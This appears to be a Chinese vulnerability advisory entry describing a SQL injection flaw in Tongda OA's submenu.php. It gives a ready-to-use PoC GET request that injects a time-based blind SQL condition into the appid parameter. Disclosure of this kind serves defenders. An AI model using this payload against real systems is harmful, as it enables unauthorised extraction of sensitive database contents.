通达OA系统submenu.php存在SQL注入漏洞

日期: 2021-04-28 | 影响软件: 通达OA | POC: 已公开

漏洞描述

通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户,超过500万终端用户。通达OA系统s***u.php存在SQL注入漏洞,攻击者可利用漏洞获取网站敏感信息。

PoC代码

GET /pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
userid_flash=214eUQYFUgECBFQJVFcHCwADVlIOVAIDAgBUAlQJ HTTP/1.1

相关漏洞推荐